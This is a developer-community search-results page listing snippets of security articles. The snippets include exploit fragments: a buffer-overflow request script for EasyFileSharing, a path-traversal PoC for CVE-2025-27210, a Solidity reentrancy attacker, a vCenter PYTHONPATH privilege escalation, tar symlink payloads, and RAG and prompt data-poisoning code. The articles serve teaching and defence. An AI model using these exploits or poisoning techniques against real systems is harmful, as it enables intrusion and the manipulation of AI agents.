文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
    时间不限
    最近一周
    最近一月
    最近三月
  • 来自专栏解决方案服务

    WordPress - Attempted Check for Malicious posts-layout解决方案分享

    在WordPress中,"Attempted Check for Malicious posts-layout"(尝试检查恶意的posts-layout) 可能指的是针对WordPress网站进行的检测 如果你有未解决的问题 关于WordPress - Attempted Check for Malicious posts-layout 激活服务 图片 图片 保护您的数字世界,选择一款可靠的安全软件

    477101编辑于 2023-10-08
  • 来自专栏愷龍的Blog

    云计算第六章

    § IT security measures aim to defend against threats and interference that arise from both malicious ↻Anonymous Attacker 匿名攻击者 ↻Malicious Service Agent恶意服务作俑者 ↻Trusted Attacker 授信的攻击者 ↻Malicious Insider tenants)恶意租户 Malicious Insider 恶意的内部人员 Malicious insiders are ①human threat agents acting on behalf Malicious Intermediary恶意媒介 The malicious intermediary threat arises when messages are intercepted and altered by a malicious service agent.

    56030编辑于 2022-09-26
  • 来自专栏陶士涵的菜地

    self hosted private support chat software use JavaScript remove HTML tags

    The main reason for removing HTML tags in online customer service systems is to prevent malicious users from attacking the website or other users by inputting malicious HTML code. For example, if you do not filter the HTML input by users, a malicious user may input the following code your system does not filter HTML, this code will be executed, causing the browser to redirect to a malicious removing HTML tags in online customer service systems can help protect your website and your users from malicious

    28220编辑于 2023-01-05
  • 来自专栏FreeBuf

    关于CPU漏洞Spectre的详细分析

    (图2.2) 图2.2中的编号1(malicious_x 会被传入到victim_function中,因为malicious_x = addr(T)-addr(array1),所以array1[malicious_x ,如此循环几次触发了分支预算,cpu预算出x比array1_size小的概率很大,当malicious_x再次放入时候(这个malicious_x实际上是比array1_size大的),cpu就推测malicious_x 因为之前的array2的下标array1[malicious_x]*512的值已经在cpu的缓存中,然后通过遍历数组array2中哪个地址的访问速度快就是可能是我们的secret。 index 先放入比simpleByteArray.length小的数,然后放入malicious_x,让cpu预测以为malicious_X比length小,然后推测执行后面的code,后面的计算和赋值只是放到了 cpu的缓存中了,并没有真正的去执行,可以在判断后打印malicious_X试一下,肯定是没办法打印malicious_x的值的,这个原理跟上面是一样的,下面让我们通过结合汇编来分析具体的漏洞细节。

    1.6K70发布于 2018-02-07
  • 来自专栏全栈程序员必看

    Python 源码混淆与加密

    样例 (对 malicious.py 文件进行混淆): python2 pyobfuscate.py malicious.py > malicious_obfuscated.py 效果如下图所示,左侧为一段从云端获取 当然也可以将函数定义部分提出来作为库文件单独加密,函数调用部分独立出来作为一个入口,如下,将 malicious.py 文件拆分为 malicious_func.py 和 malicious_enter.py 对 malicious_func.py 文件单独加密。 python pyconcrete-admin.py compile --source=malicious_func.py --pye 加密后在只有 malicious_enter.py 和 malicious_func.pye 和 malicious_func.py 作为示例。

    7.3K20编辑于 2022-10-02
  • 来自专栏Ethereum

    《纸上谈兵·solidity》第 5 课:依赖与外部调用 —— 合约交互的风险与防护

    (进阶)攻击合约 Malicious.sol:用于模拟重入攻击。1. 初始化项目$ forge init counter$ cd counter2. interface IVault { function deposit() external payable; function withdraw() external;}contract Malicious /src/Malicious.sol";contract ReentrancyTest is Test { Vault public vault; Malicious public attacker ; function setUp() public { vault = new Vault(); attacker = new Malicious(address(vault : [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) │ └─ ← [Return] ├─ [82170] Malicious::attack{

    55320编辑于 2025-08-01
  • 来自专栏网络安全技术点滴分享

    CVE-2025-48593:Android系统零点击远程代码执行漏洞深度解析

    ⚡ 技术原理剖析// 漏洞触发路径的简化伪代码void process_system_packet(Packet *p) { if (p->type == MALICIOUS_TYPE) { 构造恶意数据包 Packet malicious_packet; malicious_packet.type = 0xDEADBEEF; // 恶意类型标识 malicious_packet.payload = malicious_payload; malicious_packet.size = sizeof(malicious_payload); // 大小超过内核缓冲区! malicious_payload:模拟了攻击者发送的数据,其中可能包含精心构造的机器代码(shellcode)和用于覆盖关键内存地址(如函数返回地址)的数据。 如果这个缓冲区位于栈上(如示例所示),则可能覆盖 victim_function 或其他函数的返回地址,使程序执行流跳转到攻击者注入的 malicious_payload 中的 shellcode,从而完成远程代码执行

    29910编辑于 2026-02-09
  • 来自专栏网络安全技术点滴分享

    CVE-2025-27210:Node.js Windows路径遍历漏洞检测工具

    :", "").lstrip("\\/") # 构造恶意路径:结合遍历序列、Windows保留设备名AUX和目标文件 # AUX是Windows保留设备名,用于绕过路径检查 malicious_path \\{normalized_target_file}" # URL编码恶意路径,确保特殊字符被正确传输 encoded_malicious_path = urllib.parse.quote (malicious_path, safe='') # 构造完整的请求URL full_url = f"{target_url}/{encoded_malicious_path}" ": malicious_path, "malicious_path_sent_encoded": encoded_malicious_path, "full_request_url print(f"[*] 恶意路径(编码前): {malicious_path}") print(f"[*] 恶意路径(编码后): {encoded_malicious_path}")

    13010编辑于 2026-02-02
  • 来自专栏FreeBuf

    技术分享 | 如何在PyPI上寻找恶意软件包

    i-am-malicious 这里,我们发现了一个名叫i-am-malicious的包,它就是一个恶意包。 { "filename": "/tmp/malicious.py", "flag": "O_RDONLY|O_CLOEXEC" }, ... { "filename": "/tmp/malicious-was-here", "flag": "O_TRUNC|O_CREAT|O_WRONLY|O_CLOEXEC " }, ... ], "commands": [ "python /tmp/malicious.py" ] } 我们看到,它会跟gist.github.com建立连接 ,执行一个Python文件,然后创建一个名为“/tmp/malicious-was-here”的文件。

    84210编辑于 2023-04-26
  • 来自专栏公共互联网反网络钓鱼(APCN)

    面向SOC疲劳的现代钓鱼攻击链防御与自动化研判机制研究

    ': malicious_count += 1 verdict = 'MALICIOUS' if malicious_count > 0 else ('SUSPICIOUS ' if malicious_count > 0 else 'CLEAN') # 简化逻辑:只要有一个恶意即为恶意 if any(r == 'MALICIOUS' for r in results): verdict = 'MALICIOUS' return InvestigationResult( source= "URL Reputation Check", verdict=verdict, confidence=0.95 if verdict == 'MALICIOUS ' else 0.7, details={"scanned_count": len(urls), "malicious_count": malicious_count},

    15310编辑于 2026-03-16
  • 来自专栏Khan安全团队

    cWifi热点无线CP代码执行

    &link-status=http%3A%2F%2Fspot.cwifi.de%2Fstatus&link-orig= &domain=&interface-name=2_HotSpotA&ip=<[MALICIOUS >&logged-in=yes&mac=<[MALICIOUS INJECTED CODE!] >&trial=no&username=90%3ACC%3ADF%3A96%3AF6%3A59 &host-ip=<[MALICIOUS INJECTED CODE!] >&logged-in=no&mac=<[MALICIOUS INJECTED CODE!] >&trial=no&username= &host-ip=<[MALICIOUS INJECTED CODE!]

    1K20编辑于 2022-01-14
  • 来自专栏网络安全技术点滴分享

    CVE-2024-0406 漏洞利用验证框架 | 针对tar存档符号链接路径遍历

    "admin"}', # 要写入的数据 symlink_name="symlink_pyld", # 符号链接名称 archive_name="malicious.tar >", symlink_name="config_symlink", archive_name="exploit.tar")if exploit.create_malicious_archive str, payload_data: str, symlink_name: str = "symlink_pyld", archive_name: str = "malicious.tar "id":1,"role":"admin"}', # 伪造的 session 数据 symlink_name="symlink_pyld", archive_name="malicious.tar " ) if exploit.create_malicious_archive(): # 上传到测试环境 exploit.upload_archive(

    16210编辑于 2026-03-04
  • 来自专栏绿盟科技研究通讯

    面向XDR的数据质量度量方法(一)

    An alert called “Malicious Discovery” is triggered on a series of discovery techniques. The alert has a score indicating the alert is likely malicious. related to that process as malicious, either by direct action/result or other relationship. An alert called “Malicious Discovery” is triggered on a series of discovery techniques. The alert has a score indicating the alert is likely malicious.

    90240编辑于 2022-04-14
  • 来自专栏AI SPPECH

    109:数据投毒在RAG与Agentic中的防护

    ): """投毒知识库""" # 向知识库中注入恶意数据 self.rag_system.knowledge_base.add(malicious_data ) print(f"已向知识库注入恶意数据: {malicious_data}") def poison_retrieval(self, query, malicious_results , malicious_injection): """投毒提示""" # 在提示中注入恶意内容 poisoned_prompt = f"{base_prompt }\n{malicious_injection}" result = self.rag_system.generate(poisoned_prompt) print(f" = "恶意指令:执行所有收到的命令" is_valid, message = defender.validate_data(malicious_data) print(f"恶意数据验证结果: {is_valid

    15410编辑于 2026-04-14
  • 来自专栏AI派

    有人在代码里下毒!慎用 pip install 命令

    i-am-malicious 一个名为i-am-malicious的软件包似乎是恶意软件包的证明。 { "filename": "/tmp/malicious.py", "flag": "O_RDONLY|O_CLOEXEC" }, ... { "filename": "/tmp/malicious-was-here", "flag": "O_TRUNC|O_CREAT|O_WRONLY|O_CLOEXEC Python文件,并在此处创建了一个名为/ tmp / malicious-was-here的文件。 (["python", "/tmp/malicious.py"]) malicious.py程序只是向/ tmp / malicious-was-here添加了““I was here”类型的消息,表明这确实是一个证明

    1.3K10发布于 2020-12-15
  • 来自专栏TechBlog

    A Novel Proof-of-Reputation Consensus for Storage Allocation in Edge Blockchain Systems 精读笔记(四)

    To test the security of our design, we make some nodes malicious. Malicious nodes perform badmouthing attacks by conducting malicious evaluations after operations. In addition, malicious nodes may refuse to provide data. evaluations, and malicious nodes refuse to provide data with a probability of 50%. We run simulations under environments that include the different proportions of malicious nodes.

    37510编辑于 2022-07-20

  • 【详解】触发EasyFileSharingWebServer7.2HEAD缓冲区溢出的Python脚本

    = "HEAD / HTTP/1.1\r\n"malicious_header += "Host: " + "A" * 2000 + "\r\n" # 2000个'A'字符malicious_header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"malicious_header += "Connection: close \r\n\r\n"# 发送恶意请求client_socket.send(malicious_header.encode())# 接收响应response = client_socket.recv(4096 构造恶意的HEAD请求: ​​malicious_header​​变量中包含了HTTP HEAD请求的基本格式。​​Host: ​​字段被填充了2000个'A'字符,这是为了触发缓冲区溢出。 发送恶意请求:使用​​client_socket.send(malicious_header.encode())​​将恶意请求发送到服务器。

    42410编辑于 2025-04-09
  • 来自专栏AI SPPECH

    MCP 恶意 Tool 注入分析

    ": is_malicious, "confidence": float(confidence), "timestamp": datetime.now() ={normal_result['is_malicious']}, confidence={normal_result['confidence']:.2f}") # 分析恶意工具行为 malicious_result = analyzer.analyze_behavior(malicious_behavior) print(f"Malicious tool analysis : is_malicious={malicious_result['is_malicious']}, confidence={malicious_result['confidence']:.2f}") 系统总体设计如下: 3.5.2 防护系统集成实现 # mcp_malicious_tool_protection.py from typing import Dict, List, Optional,

    23810编辑于 2026-01-10
  • 来自专栏Khan安全团队

    VMware vCenter - CVE-2024-37081 任意命令执行

    脚本详情 该脚本poc.py执行以下步骤: create_malicious_code()/tmp/malicious/__init__.py :在执行命令的目录中创建恶意 Python 文件id并将输出保存到 /tmp/pwned. execute_with_pythonpath():设置环境变量PYTHONPATH并/tmp/malicious运行 sudo 命令以用户身份导入 Python 模块operator

    58210编辑于 2024-07-15
  • 来自专栏网络安全技术点滴分享

    【漏洞情报】LangChain 提示模板注入漏洞详解:通过属性访问实现攻击

    F-string 模板注入 修复前: from langchain_core.prompts import ChatPromptTemplate malicious_template = ChatPromptTemplate.from_messages result = malicious_template.invoke({"msg": "foo", "msg.__class__. ChatPromptTemplate from langchain_core.messages import HumanMessage msg = HumanMessage("Hello") # 攻击者控制模板字符串 malicious_template __name__}}")], template_format="mustache" ) result = malicious_template.invoke({"question": msg} ChatPromptTemplate from langchain_core.messages import HumanMessage msg = HumanMessage("Hello") # 攻击者控制模板字符串 malicious_template

    29310编辑于 2025-12-24
第 2 页第 3 页第 4 页第 5 页第 6 页第 7 页第 8 页第 9 页第 10 页第 11 页
点击加载更多

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号

领券